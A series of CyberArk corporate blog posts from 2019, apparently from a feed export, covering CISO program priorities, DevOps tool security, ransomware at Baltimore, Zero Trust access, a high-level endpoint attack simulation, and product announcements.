Following are recommended actions CISOs can take to avoid five common pitfalls.  Subsequent articles will get into more depth on each.

1. Prioritize business risk

Many cybersecurity programs are attempting to boil the ocean rather than focusing on or starting with what’s most important for business.  If you knew that 20% of the information, business processes, and operations were what mattered most to your business, wouldn’t you put more effort into protecting that 20%?

There are some legacy methodologies companies use to attempt this.  Some companies have focused on traditional information classification frameworks to identify the most critical data and assets to protect, which is not a bad place to start. However, it tends to be heavily weighted on data theft (confidentiality), leaving integrity and availability concerns disconnected. Business continuity and IT disaster recovery programs and plans traditionally work to ensure that they are able to react to availability issues from any type of outage.  That said, in many cases, these efforts are disjointed and data integrity risks are largely left to be managed by a quality or compliance department.

What to do: CISOs can help their companies connect deeply with their business and understand worst-case scenarios for information theft, manipulation or operational disruption, not limiting thinking to IT systems.  If you narrow your focus to securing the elements most critical to your business, you can build speed and depth to protect what matters most for your company’s livelihood.

Think about it this way: If your company has 1,000 IT systems and 10 different functional areas, comprising 500 business processes, then where do you start?  How far do you go?  Is everything critical?  I’ve seen companies fail to answer this question and stall or significantly slow their efforts on a critical control or focus only on one risk dimension (e.g. compliance, or data theft).

You can identify your most critical business risks by imagining what a CEO would be most concerned about if a cyber attack hit at 3 a.m. on a Saturday. The CEO won’t be thinking about the technical details or what strain of malware is the most likely: The focus will be on business risk and operational impact.  Keep this in mind when you choose where to focus your information security program.

2. Avoid getting caught up in the media’s fascination with reporting on breaches

Media distractions are on the rise.  Due to mostly privacy-driven data breach reporting laws, media attention tends to focus on customer breaches and exposed personal information.  This reporting bias doesn’t account for all of the internal and external attack types and the companies’ true risk impact profile. When you’re inundated with stories of cybersecurity breaches, it’s easy for your company’s executives to get into a reactive mindset or to start exhibiting confirmation bias that may or may not be applicable or top risks within an organization’s sector.  This kind of thinking can point you away from your company’s biggest risks.

What to do: While you can’t control the articles your company executives read, there is a strategy to avoid whipsaw reactions to specific vulnerability and breach-related news.  You can leverage news media in a way that provides isolated value instead of distraction by getting deeply involved in threat intelligence and sharing with other companies (especially within the same industry or sector). Evaluate the input from the media against your business-driven risk management processes so that you can rationalize what you should react to and act upon.

3. Be strategic about your cyber tool plays

Judging from the social media backlash about the “vendor circus” at major security conferences and events, there is some recognition and reflection about the cyber tool sprawl.  When it comes to AI, machine learning and blockchain, we are often promised silver bullets – and told that we’re going to need them.  This creates a sense that, if you don’t deploy a vendor’s magical new solution, then you face an imminent failure to protect your company.

I recently learned of a smaller organization’s security leader who was proud to have acquired seven marquee threat detection tools, but when asked about how he had the ability to leverage them all effectively, he responded with, “I focus on the one that is giving me the most actionable data.” In other words, he was only actually using one threat detection tool at a time. The other six were still running and producing logs and alerts, but no one was looking at them.

What to do: Don’t expect your strategic architecture practices to start out fully mature.  Bring a deeply experienced, big picture security architect on board to develop an ecosystem of cyber security tools that work together and are appropriately scalable.  CISOs need to look past initial funding for “cool” tools toward more comprehensive total cost of ownership (for both internal and external resources), linkages to business scope, ability to drive down risk and plans for appropriate scale.

4. Solidify the basics

The basics matter.  It is difficult to achieve comprehensive risk reduction if you don’t have the fundamental concepts nailed down.  The Center for Internet Security Critical Security Controls (CIS CSC) lists inventory and control of hardware, inventory and control of software, continuous vulnerability management and controlled use of administrative privileges as the top four basic controls. However, many companies report incomplete or ineffective efforts in all four of these fundamental efforts.  Meanwhile, investments may be focused more on the “sexy” tools and controls that are popular in the market.

 What to do:  The solution is not to completely stop everything to catch up on the basics, but it does call for some ruthless prioritization and the rekindling of core efforts to ensure you team isn’t spread so thin working on shiny new tools that it obstructs progress on critical building blocks.

The CIS CSC provides a robust and periodically updated playbook.  They even recently segmented the first six controls into a grouping of Basic CIS Controls.  They include hardware and software inventory, vulnerability management, controlling admin privileges, secure configuration (hardware/software) and maintenance and monitoring of logs.  While they all seem essential for any security program, far too many companies do not have solid progress and maturity towards these.

Connecting the dots between prioritizing business risk and solidifying the basics, does your company leverage business risk to drive privileged access management programs?  Are the biggest risks being dealt with first or are you using a first come, first serve model that may not be most effective for your organization?

5. Get tools and capabilities to the appropriate scale

Buying a tool and not implementing it at scale to protect your business information assets does not drive risk reduction.  Far too often, a company will buy a tool (or 10), have some wins implementing some of the features and then either move on to the next thing or realize they don’t have resources to execute to scale or to support the tool after the initial investment money runs out.

What to do: Getting to the appropriate scale with these efforts is the only way to fully achieve the risk reduction efforts that your money, time and effort will have costed you.

Scaling is hard.  It can be grueling at times.  However, it is where the magic happens with risk reduction.  Remember, “scale” doesn’t have to mean “turn it on everywhere.”  In fact, “appropriate scale” connects directly back for the business risks you are intending to reduce.

Companies that achieve appropriate scale leverage solid and consistent project management and measurement methodologies. They think proactively about total cost to achieve desired risk reduction and they don’t cut and run when they see the next shiny object or tool their peer company decided to implement.  Since many CISOs only have a 17-24-month CISO tenure, they may not be focusing on long-haul solutions at scale.

The flip-side precaution is that proven leaders (if they are using measurement tools) know when something is not working or performing to the desired outcomes.  In this case, cutting a project or capability may be warranted.  However, if this is the case, cut the entire capability and solution; don’t leave it running with a skeleton team keeping it alive.  This will cost in more ways than one in the long run.

Stay tuned for deeper dives on these topics!  You can reach me at askAaron@revealrisk.com with any questions or ideas on these topics or visit my LinkedIn page here.

]]>
Contribute Your Integration to CyberArk Marketplace for a Chance to Win https://www.cyberark.com/blog/contribute-your-integration-to-cyberark-marketplace-for-a-chance-to-win/ Sat, 15 Jun 2019 12:45:24 +0000 https://www.cyberark.com/?p=68511

CyberArk believes that cybersecurity is a team game. This is an important tenet in our approach to building technology partnerships that deliver measurable, long-term value to our customers through an integrated security stack. That’s why we’ve worked hard to grow CyberArk Marketplace, providing customers and partners with best-of-breed integrations, tools and scripts to extend the benefits of privileged access management (PAM) across their organizations to mitigate risk and evolve digital transformation strategies.

Since the launch of CyberArk Marketplace last year, we’ve nurtured an enthusiastic and fast-growing ecosystem of partners and customers, logging more than 13,000 privileged access management technology integration downloads to date.

Building on this momentum, we’re thrilled to announce that we’re expanding CyberArk Marketplace to support contributions from our expansive network of security professionals. The launch of community integrations enables CyberArk C3 Alliance members, strategic partners, customers and community contributors alike to submit and upload their own integrations with the CyberArk Privileged Access Security Solution, making it easier than ever to:

  • Showcase their company’s solutions and capabilities to the more than 10,000 monthly visitors.
  • Highlight their development expertise in key areas such as cloud, containers, DevOps and Robotic Process Automation.
  • Collaborate with other security professionals and tap into insights from the larger security community.
  • Make an impact in the fight against attackers while driving rapid customer value: integrations can be downloaded in just four clicks, giving organizations the speed and agility to further improve security and reduce risk.

Submit Your Integration by July 12 to Win the CyberArk Marketplace Impact Award

When you contribute integrations to CyberArk Marketplace, everyone benefits. From now until July 12, MVPs who contribute integrations with the greatest potential for impacting security have a chance to win the CyberArk Marketplace Impact Award.

Think you’ve got what it takes? Does your integration:

  • Take a unique approach?
  • Deliver distinct value or transformational experience?
  • Securely connect to high-value targets or devices?
  • Make significant downstream impact?

If so, submit your integration today for a chance to win!  The CyberArk Marketplace Impact Award winner will receive a $500 Amazon gift card, a CyberArk Marketplace Impact Award trophy, loads of CyberArk swag – and will be featured in a spotlight article on the CyberArk blog!

This contest is open to all current CyberArk customers and partners and contributing is simple. Just sign in to CyberArk Marketplace, click “My Contributions,” click “Contribute” and follow the wizard. It’s that easy! If your submission is accepted and published, you will be automatically entered for a chance to win the Marketplace Impact Award. To learn more about the contest, visit here.

We’re all in this together against a common enemy – cyber attackers. Now is the time to contribute to – and tap into – this fast-growing community’s collective brainpower and resources. Submit your integration today!

]]>
Top CISOs Share Steps to Prioritize DevOps Tools and Cloud https://www.cyberark.com/blog/top-cisos-share-steps-to-prioritize-devops-tools-and-cloud/ Thu, 13 Jun 2019 13:00:04 +0000 https://www.cyberark.com/?p=68437

Editor’s Note: Part 2 of a 5 Part series on securing DevOps environments based on insights from Global 1000 Chief Information Security Officers in the CISO View report.

  1. Transform the security team into DevOps partners
  2. Prioritize securing DevOps tools and infrastructure
  3. Establish enterprise requirements for securing secrets and credentials
  4. Adapt processes for application testing
  5. Evaluate the results

The power of the DevOps tool chain and their associated privileged accounts and secrets make them a top priority for security teams, along with protecting the development and production environments themselves. In The CISO View – Protecting Privileged Access in DevOps and Cloud Environments, published earlier this year, our panel of expert CISOs weighed in on their experiences securing key tools and infrastructure to help their organizations achieve successful DevOps outcomes and progress on their digital transformation journeys.

Here are five of their recommendations for how CISOs and their security teams should prioritize protection of DevOps tools and processes:

1. Set and enforce policies for the selection and configuration of tools. Since you can’t protect what you don’t know about, first take a full inventory of the DevOps tools being used by the development teams. While challenging, this is especially important for open source tools, since 58 percent of today’s businesses are utilizing open source heavily to flatten learning curves and speed release cycles. Once these tools are accounted for, conduct a thorough evaluation to identify any existing security deficiencies and address them promptly. For example, make sure tools are not being used in an unsecure default configuration and that they are kept up to date.

When it comes to evaluating new tools, security teams should find a way to get a seat at the table by collaborating with the group responsible for tool selection and configuration (e.g., a COE or Engineering Council) or working closely with Procurement to select the best tools for the organization and establish enterprise security standards from the start.

2. Control access to DevOps tools. Since attackers may only need to exploit one vulnerability to carry out their mission, it’s important to address security requirements and potential vulnerabilities holistically. This starts by securing DevOps and cloud management tools’ secrets and credentials in an encrypted vault protected with multi-factor authentication (MFA). Provide just-in-time access so users can gain high-level access only when it’s needed to perform certain tasks – and ensure that this temporary usage is closely monitored. Additionally, limit access to high-risk commands within DevOps tools. For instance, Docker users often run a Docker container with the —privileged flag, which gives the container direct access to host elements. Ensure users are not able run containers with this flag – and if it’s a “must,” severely limit user access and monitor and record all activities with the –privileged flag.

Follow other cyber hygiene best practices, such as setting up access controls that segregate DevOps pipelines so attackers cannot gain access to one and then move to another; ensuring that credentials and secrets are not shared between DevOps tool accounts and Windows sysadmin accounts and removing all unnecessary accounts with access to DevOps tools (i.e., accounts for developers who have changed roles, don’t actually require access to tools or have left the company).

3. Reduce the concentration of privilege. Ensure least privilege by limiting each user’s level of access to DevOps tools to the minimum necessary for their role. But, don’t stop there. Configure DevOps tools to require dual authorization for certain critical functions. For instance, you can require that before a change to a Puppet manifest file goes live, a second person must review and approve the change. Additionally, implement separation of duties for build automation tools such as Jenkins, which often end up over-privileged and able to perform all duties without restriction – from building and testing to packaging. In the case of Jenkins, separate duties by implementing multiple Jenkins nodes, each dedicated to one function (build or test or package) for each application. Each node will have a unique identity and a limited set of privileges, which minimizes the impact of a potential compromise.

4. Ensure code repositories do not expose secrets. Develop risk-based policies for developers around the use of code repositories. Remember that, beyond credentials, code may contain details about the organization’s internal network that could be useful to attackers. If you can do so without adversely affecting workflow, use an on-premises rather than a cloud-based code repository. Scan the environment to make sure that any on-premises code repositories are inaccessible from outside the network. If cloud-based repositories are used, ensure they are configured to be private. Finally, before checking code into any repository, implement automated scanning to ensure code does not contain secrets.

5. Protect and monitor infrastructure. Cyber attackers seek the path of least resistance. Often, a well-crafted phishing email will do the trick, so make sure that all workstations and servers undergo regular patching, vulnerability scanning and security monitoring. Additionally, monitor your cloud infrastructure for signs of unusual credential usage or configuration changes (such as making private data stores public). Ensure VM and container images used in development and production environments come from a sanctioned source and are kept up to date. To ensure security remains “baked in” to countless rounds of automatic rebuilds, security teams should work with their DevOps counterparts to automate the configuration of VMs and containers so that, when a new machine or container is spun up, it is automatically configured securely and given appropriate controls – without requiring human involvement.

Want to dig in deeper? Download the full CISO View report, watch a brief highlights video, tune-in to our related webinar or check out our post on aligning security and DevOps teams. And watch this space for our next installment covering tips for establishing enterprise requirements for securing DevOps secrets and credentials.

]]>
Forrester Recognizes Idaptive As A Leader In New The Forrester Wave: Identity-as-a-Service For Enterprise Report https://www.cyberark.com/blog/forrester-recognizes-idaptive-as-a-leader-in-new-the-forrester-wave-identity-as-a-service-for-enterprise-report/ Wed, 12 Jun 2019 18:26:32 +0000 https://www.cyberark.com/?p=99582

Idaptive is leading the IDaaS market, cited for the solution that emphasizes “identity threat intelligence and device posture and management capabilities”

This week we are honored to share that Forrester has recognized Idaptive as one of only two leaders in The Forrester Wave™: Identity-as-a-Service For Enterprise, Q2 2019 report. We believe being named a Leader reflects the success that our customers and partners achieve using the Idaptive Next-Gen Access Platform to secure access to their applications and delight their users. We’re proud of this achievement because it confirms that Idaptive uniquely addresses our customers’ needs with an innovative platform that provides single sign-on (SSO) and adaptive multi-factor authentication (MFA), in addition to user behavior analytics (UBA), user lifecycle management (LCM) and endpoint management (EMM) capabilities.

Report Highlights

In this report, Forrester assessed ten identity and access management solutions against 37 criterion such as access management policy administration, mobile IDaaS functionality, and solution APIs. In addition to being named a Leader, citing the strength of our solution functionality and strategy, Forrester highlighted Idaptive for offering APIs and broad support for self-service capabilities.

Security and risk professionals should look for IDaaS solutions that “…expose full IDaaS functionality in native mobile applications, master API security and solution APIs, and maintain a broad, international implementation partner ecosystem,” according to the Forrester report.

In the Idaptive vendor profile, the Forrester analyst team wrote:

“…Idaptive has been maintaining its inherited security certifications, emphasizing its identity threat intelligence and device posture and management capabilities. The solution has a granular and flexible SaaS app access policies, and a provisioning workflow for SaaS cloud applications. It has a modular, building-block-based authentication support, and it’s easy to add new TOTP/HOTP tokens. APIs are documented and flexible for IDaaS policy management and outbound integration.”

Although the report identifies some features currently not present in the Idaptive cloud directory and noted that productized Microsoft Azure and Google GCP admin console and role provisioning support are not available, Idaptive is in development of these features and plans to release them later this year.

Next-Gen Access Management: The Intelligent Choice

Our comprehensive Next-Gen Access Cloud adds a layer of intelligence which helps companies verify and validate users, devices, and services while continuously learning from, and adapting to, millions of risk factors.

With Idaptive, companies know their sensitive information is secure, and users can access the apps and services they need with less friction and frustration. In addition, the Idaptive Next-Gen Access Cloud enables users to:

  • MANAGE IDENTITY WHERE YOU CAN CONTROL AND SECURE IT: Idaptive is the only Leader that does not require synchronization of the identity repository with Idaptive Cloud Directory. This provides you the flexibility and confidence of being able to secure and control identity data in a directory of your choice, with the tools and technologies of your choice.
  • SECURE THE HYBRID ENTERPRISE: Idaptive is the only Leader that is consistently delivering on our promise of supporting a hybrid enterprise with our comprehensive support of modern cloud-based apps and on-prem legacy apps.
  • ACT ON INTELLIGENCE: Idaptive is the only Leader that has a machine learning user behavior analytics engine, with an extensive data visualization toolset for descriptive and predictive identity analytics. Idaptive collects user activity data from our own service, as well as third-party SIEMs and threat intelligence platforms, and leverages unsupervised machine learning to develop user behavior models. These models are continuously updated as more data is ingested, which makes our models accurate and effective in acting on malicious user behavior.

Looking Ahead

We are grateful to our customers who participated in this study and gave us their vote of confidence. We are committed to building the best identity and access management platform for our customers. For example,  we will continue to expand our service to empower developers by building new SDKs for mobile and web platforms, offer extensible identity lifecycle management to support provisioning into on-prem applications, and provide deeper analytical insights by collecting anonymized data from our cloud tenants to discover malicious IP addresses, and detect anomalous behaviors.

Download The Forrester Wave™: Identity-as-a-Service For Enterprise, Q2 2019 here .

[1] The Forrester Wave™: Identity-as-a-Service For Enterprise, Q2 2019, Forrester, Inc., June 12, 2019

]]>
CyberArk Introduces Privileged Access Security Assessment Tool https://www.cyberark.com/blog/cyberark-introduces-privileged-access-security-assessment-tool/ Tue, 11 Jun 2019 13:00:04 +0000 https://www.cyberark.com/?p=68261 Security Assessment Tool

Privileged access management (PAM) is a key pillar of an effective security program. We take our role as a trusted adviser to our customers very seriously and are constantly looking for new ways to help evolve existing privileged access management programs – or guide organizations that are getting started – to prioritize risk and identify opportunities to measure success and demonstrate quantifiable value to the business. CyberArk has interviewed hundreds of organizations, including customers and those who have not yet adopted a privileged access management solution, to determine the biggest hurdles companies face when it comes to privileged access management and what they need to overcome them. We found three key trends:

  • Organizations, especially those with resource constraints (basically every company, everywhere), struggle to identify the security goals that provide the most security value to their business in terms of both cybersecurity risk reduction and ROI.
  • Companies that adopted a PAM solution were able to accomplish the goals they originally set out to achieve, but they didn’t know where to go next to continue improving their security. They often spoke of “best practice” programs they wanted to follow, but had difficulty applying those programs in a way that provided tangible outcomes specific to their needs.
  • Organizations are looking for cybersecurity tools that provide clear advice, backed by quantitative methods to help guide them along their security journey.

CyberArk is proud to introduce the CyberArk Privileged Access Security Assessment Tool to guide organizations across all three fronts.

 

During an assessment, a technical expert from CyberArk or one of our certified partners will sit with your team, walk you through the process with cybersecurity assessment tool and discuss how your organization is protecting privileged accounts and access today. We frame this conversation on the CyberArk Privileged Access Security Cyber Hygiene Program, which defines seven goals organizations should strive to accomplish to build a comprehensive program to secure privileged access. Based on our findings, the CyberArk Privileged Access Security Assessment Tool will deliver three outputs that will inform not only your technical teams, but also business and IT leaders who are becoming increasingly interested in what security teams are doing to protect the brand.

Output 1: Privileged Access Security Score

Cybersecurity assessment tool
Security score and evaluation history from the Privileged Access Security Assessment tool

You can think of the privileged access security score as similar to a FICO or NPS score in that it reflects concrete metrics and can be tracked over time. The score is based on feedback provided to assessment and evaluation criteria developed by CyberArk. The Privileged Access Security Score is something tangible that organizations and security leaders can use to demonstrate the progress they’ve made  in building a strong privileged access management program.

Output 2: Rich comparison data

Cybersecurity assessment tool
Comparison data from the Privileged Access Security Assessment tool

The rich comparison data provides a comparison against peers based on industry, company revenue, number of employees and a variety of other distinctions. We call this collection of attributes a reference group. This data is crucial for leaders interested in understanding how their investment compares to others in their reference group.

Output 3: Assessment report, complete with specific recommendations

For companies that have completed an assessment already, this output has been cited as the most significant in terms of direct value to the business. The assessment report provides companies with a recap of their most recent assessment, a visual history of their assessments, the comparison data from above and, most importantly, specific advice based on their individual feedback.

We give companies technical and process recommendations for the two of the seven goal of the assessment.  These are the areas they should prioritize in the next 12-24 months and the assessment report clearly defines the actions to take to improve privileged access management and protect your organization’s business.

Read the press release to learn more about how the industry, including leading cyber security insurance firms, are leveraging Privileged Access Security Assessment Tool from CyberArk. Get started by filling out a request form or by reaching out to your CyberArk representative.

 

]]>
A Troubled City Reminds Us That Ransomware Is Here to Stay https://www.cyberark.com/blog/a-troubled-city-reminds-us-that-ransomware-is-here-to-stay/ Thu, 06 Jun 2019 13:00:30 +0000 https://www.cyberark.com/?p=68006 Ransomware attack

Since early May, Baltimore has been crippled by a massive ransomware attack that has held many of the city’s IT systems hostage. The attack has effectively “frozen” thousands of government computers, causing everything from real estate sales delays to water bill payment disruptions.

The cyber attackers responsible for the attack have demanded 13 bitcoins — worth about $100,000 – in order to restore these systems. Baltimore City Mayor Jack Young has publicly stated that the city will not pay the ransom demand, but even though the FBI, Secret Service and a host of cybersecurity experts are working around the clock to get things back to normal, new reports indicate the attack will ultimately cost the city more than $18 million.

Just this week, a Krebs on Security post quotes a source who says “it’s not terribly likely” that the Eternal Blue exploit was used to propagate the Robbinhood ransomware, debunking earlier reports that linked the Baltimore ransomware attack to the hacking tool developed by the U.S. National Security Agency (NSA) and leaked online in 2017.

Ransomware Attacks Against State and Local Governments On the Rise

According to the latest Verizon DBIR report, ransomware accounts for nearly 24 percent of all malware-related attacks across industries. Meanwhile, a 2019 Beazley Group breach insights report notes a staggering 105 percent spike in ransomware notifications from the first quarter of 2018 to the same period this year. Payment demands are also increasing significantly. The Beazley report indicates that the average payment in the first quarter of 2019 – $224,871 – has already far-surpassed 2018’s total of $116,324.

As evidenced by the Baltimore attack, state and local governments seem to be particularly vulnerable to ransomware. Cybersecurity research firm Recorded Future recently published an interesting study on the surge in state and local government ransomware attacks targeting essential infrastructure and processes, which revealed that reported attacks on state and local government skyrocketed by 39 percent in 2018. Some additional findings include:

  • At least 169 county, city or state government systems have been attacked since 2013, including at least 45 police and sheriff’s offices.
  • These attacks hit 48 out of 50 states, as well as Washington D.C.
  • Twenty-four of these attacks were against local school systems or colleges.
  • The primary ransomware families used for ransomware attacks in the past 24 months were GandCrab and Ryuk.
  • Many of these attacks were opportunistic: In many cases, attackers “stumbled” upon public-sector entities when looking for vulnerable targets. However, once they were identified, the attackers focused on these targets, recognizing the potential for notoriety and heavy media coverage.
State and Local Government Ransomware Attacks
State and local government ransomware attacks. Source: Recorded Future

Since the conclusion of the Recorded Future study in April 2019, several new ransomware attacks against state and local governments beyond Baltimore have made headlines – from Lynn, Massachusetts to Cartersville, Georgia. It’s safe to say that these types of attacks are not going away any time soon.

Four Tips for Mitigating Risk of Ransomware Attacks

While there is no silver bullet for ransomware prevention, there are a number of steps government agencies and enterprises alike can take to dramatically reduce the risk of malware, such as Robbinhood, from spreading and wreaking major havoc.

  1. Backup all critical data. Sure, it seems like cybersecurity 101, but it’s amazing how many organizations don’t do this on a regular basis. Prioritize data that is critical to your organization and consistently back it up so that if files are locked and held for ransom, you can still keep (at least parts of) your business running.
  2. Never stop patching. Consistently patching endpoints and servers will dramatically reduce the attack surface, making a compromise far less likely. If you haven’t already, stop what you’re doing and immediately disable the (very) outdated Microsoft SMB protocol version 1 or apply patch MS17-010. And don’t stop there. Patch all vulnerable software regularly to help prevent ransomware infections – and make sure your antivirus, firewall and other perimeter protection tools are always up to date.
  3. Beware of phishing. According to the Verizon DBIR report, phishing is involved in 32 percent of today’s breaches and 78 percent of cyber-espionage incidents. Attackers often begin their malware attacks through targeted phishing campaigns. If you receive an unsolicited call, email, text message or chat, do not respond or click on any links – even if the person claims to be from a legitimate department – before confirming legitimacy.
  4. Remove local admin privileges to contain and block attacks. While employee education around phishing is important, it cannot stop there. Removing local administrator rights is the foundation of effective endpoint security. By implementing a combination of least privilege and application control policies on endpoints and servers as part of a larger Zero Trust approach, you can mitigate the risk of malware like Robbinhood spreading from its initial infection point. Based on testing by CyberArk Labs, the removal of local administrator rights, combined with application control and greylisting, was 100 percent effective in preventing ransomware from encrypting files.

 Traditional antivirus/next-generation antivirus or endpoint detection and response solutions cannot block ransomware on their own. CyberArk Endpoint Privilege Manager adds a critical layer of protection to strengthen your organization’s existing endpoint security toolset, allowing you to contain attacks, such as malware and ransomware, at the endpoint. With out-of-the-box policy definition for ransomware protection – including comprehensive least privilege controls tested on hundreds of thousands of malware samples – you can effectively block the spread of malware across your network, dramatically reducing remediation time and effort.

Don’t wait until your organization is front-page news and locked out of critical systems. Take proactive steps to protect privilege on the endpoint and contain attacks early in their lifecycle. Learn more in our solution brief or in this short video.

 

]]>
The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance https://www.cyberark.com/blog/the-future-of-cybersecurity-is-artificial-intelligence-will-transform-enterprise-governance/ Thu, 30 May 2019 19:31:15 +0000 https://www.cyberark.com/?p=98918

Over the past several weeks, I’ve explained how to verify every user and then validate their devices as part of a Zero Trust approach to cybersecurity. Now, it’s time to tie everything together with the final ingredient of the Zero Trust formula: intelligently limiting user access.

What do we mean by “intelligently limiting access”? Well, not all people need the same access to the same systems and applications. Some people (like HR or Finance) handle sensitive, private data, others don’t. Some people travel a lot with their job, some almost never. You get the gist. When you intelligently limit access to an organization’s systems and applications, you’re making it easy for each person — whether employee, partner, customer, etc. — to access what they need, when they need it, wherever they are, and on the device of their choosing.

Rise of the Machines

Modern machine learning and user based analytics can transform how you intelligently limit access, ultimately helping strike a balance between security and productivity.

Information about the user, endpoint, application or server, policies, and all activities related to them can be collected and fed into a data pool that fuels machine learning. This system can then automatically recognize out-of-the-ordinary behaviors, such as a user trying to access resources from an unusual location, which immediately raises a red flag requiring additional authentication or blocked access.

By feeding every access attempt back into an analytics platform, you can apply modern machine learning to build individual profiles for every user. Picture this: a user logs into her laptop using Multi-factor Authentication (MFA), while working from the corporate network, on a registered device she always uses, accessing the same apps she always does, at the same time of day as always. Great! You can confidently provide her easy access through single sign-on to her app instead of prompting her for additional verification.

Machine learning can greatly reduce the complexity of analysis that needs to be performed by IT responsible for overseeing access controls. Instead of writing complicated rules, IT can decide how to respond to the risk level of an access attempt, saving a great deal of time and frustration.

Steps to Zero Trust

Now that we have the three pillars of a Zero Trust approach down, how do we go about piecemealing together a solution with products from various vendors all purporting to solve a piece of the puzzle? Next up, we explore the steps to executing a Zero Trust approach. See how Idaptive Secures Access Everywhere.

______

 

Read the Zero Trust series here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
Spotlight on Administrator Rights and Privileged Credential Theft https://www.cyberark.com/blog/spotlight-on-administrator-rights-and-credential-theft/ Thu, 30 May 2019 13:00:22 +0000 https://www.cyberark.com/?p=64956

You recognize the importance of defense-in-depth and use multiple layers of security to protect your organization’s most important data and assets. But, like many organizations, you could be overlooking a critical step in containing cyber attacks early in their lifecycle by failing to remove local administrator rights.

The Foundation of Effective Endpoint Security

Users with local admin rights have the power to do virtually anything they want on their workstations. They can download applications, use any program, modify system configurations and even access and change powerful administrative accounts. No matter how strong your perimeter security may be – even with DLP, antivirus and other security products – a user with local admin rights can easily supersede these defenses (either unintentionally or maliciously) and install anything from unlicensed software to unsanctioned applications and dangerous malware. Similarly, these powerful admin rights can be used by attackers to steal additional credentials, elevate privileges and move laterally through the network.

Identifying where local admin rights exist, and removing those rights, is a critical first step toward strong endpoint protection. Yet, CyberArk research shows that 87 percent of organizations have yet to do so, which suggests that employee demands for flexibility and productivity are largely trumping security hygiene best practices.

The Privileged Pathway: Endpoint Attack Simulation

We recently held a webinar to shine a light on these endpoint security risks and explore common attack methods. Following are steps in an example attack scenario to illustrate the power of local administrator rights. To view the full simulation, tune in on-demand.

  1. Phishing Attack to Land on a Workstation

Attackers have myriad ways to launch their attacks – from crafty phishing attempts via emails to drive-by downloads to physical USB insertions. In this particular example, we showed how criminals often do their “homework” by reverse-engineering social media sites to gain information about their potential victims. Here, the attacker scoured LinkedIn, crafted a convincing email on commission reports, and sent it to a number of salespeople within an organization.

Administrative Rights Figure 1
Phishing email used to gain initial foothold.

 

  1. Stealthy Command and Control Communication

It’s not long before an unsuspecting salesperson reads a seemingly legitimate email, opens the attachment, and enables macros to read its contents. With this, the attacker can launch an agent (a program that maintains a connection between the attacker’s device and the compromised host) that communicates back to their command and control. In this instance, the attacker uses Powershell Empire, a post-exploitation framework for computers and servers running Microsoft Windows or Windows server operating systems.

Administrative Rights Figure 2
Powershell Empire.

 

This agent is running as a standard user, so the attacker’s next step is to try to locate and steal administrator rights. By entering just three simple command sets, the attacker is able to locate those local admin rights and generate a new agent by using them. The attacker now has full control over the user’s machine – as both a standard user and as an admin. With full admin controls, the attacker can easily see which security tools are in place (e.g. antivirus and DLP) and begin turning them off to avoid detection.

Administrative Rights Figure 3
Full machine takeover.

 

  1. Ongoing Reconnaissance

Information gathering happens during the attacker’s initial target research and throughout the attack lifecycle. Once attackers have control of a machine, they can ramp up their investigation and use local admin rights to build persistence by creating scheduled tasks, modifying registry values or launching new services. This way, any time the machine reboots, the agent will as well, making it very easy for the attacker to make their way around the system.

  1. Privilege Escalation and Lateral Movement

Once the attacker lands on a workstation, they look to steal passwords to move laterally until they find privileged credentials that enable powerful access to target systems and assets.  By stealing and utilizing legitimate credentials, attackers can persist on the network for an average of 78 days without being detected. This gives attackers ample time to seek out target systems and carry out their mission.

Administrative Rights Figure 4
The privileged pathway.

 

Credential Theft Plays a Major Part in Nearly All Targeted Attacks

While removing local admin rights greatly reduces the potential attack surface – it’s not the end of the story. Many credential theft attacks can be fully executed from a single user’s workstation by leveraging credentials stored on the device – from passwords for corporate social media accounts to administrative credentials stored in IT applications and remote access tools. These credential theft attacks have four (disturbing) things in common:

  1. They do not require admin rights to compromise credentials
  2. They are very easy to execute and well documented
  3. They are based on exploiting passwords stored in popular password storage locations such as DPAPI, Google Chrome, Filezilla and WinSCP
  4. There are numerous methods and effective tools available to attackers, such as the LaZagne Project

Advanced protection beyond the foundational admin rights removal step is needed to effectively detect and block attempted theft of Windows credentials and those stored by popular web browsers.

CyberArk Endpoint Privilege Manager helps organizations reduce risk by eliminating unnecessary local admin privileges, blocking credential theft attempts, auditing malicious behavior and strengthening the security of privileged accounts. Used in tandem with existing endpoint security tools, the CyberArk solution can dramatically strengthen protection and detection capabilities, without impacting business operations and productivity.

To learn more about CyberArk Endpoint Privilege Manager, download our solution brief and be sure to attend the full webinar, Spotlight on Administrator Rights and Privileged Credential Theft.

 

]]>
Version 10.9 Extends Security to Privileged Business Users https://www.cyberark.com/blog/version-10-9-extends-security-to-privileged-business-users/ Thu, 23 May 2019 13:00:59 +0000 https://www.cyberark.com/?p=63900

We recently announced version 10.9 of the CyberArk Privileged Access Security Solution. This release is the first enterprise-grade Privileged Access Management (PAM) solution to add functionality to extend security and credential protection for privileged business users, as well as delivering greater flexibility to reduce privilege-related risk across the enterprise.

It’s well known that social engineering and phishing attacks are the most common form of cyberattack and that business leaders are often targeted by malicious attackers because they frequently have advanced access and are not directly in the purview of IT and security teams. While business leaders don’t typically have access to IT infrastructure and assets that would fall under the purview of IT and security administrators, they do require access to data, especially sensitive data, that are highly sought after. A few examples to consider:

  • A VP of Sales has access to sales pipeline figures, bookings, customer information and a whole lot more through their Customer Relationship Management tools. Sales and marketing teams rely on this information to inform their boards, partners and analysts.
  • An HR Administrator has access to employee information like performance reviews, time off requests and health care information — all of which is confidential. This data is typically stored in an HR specific business application like SuccessFactors, Zenefits or Namely.
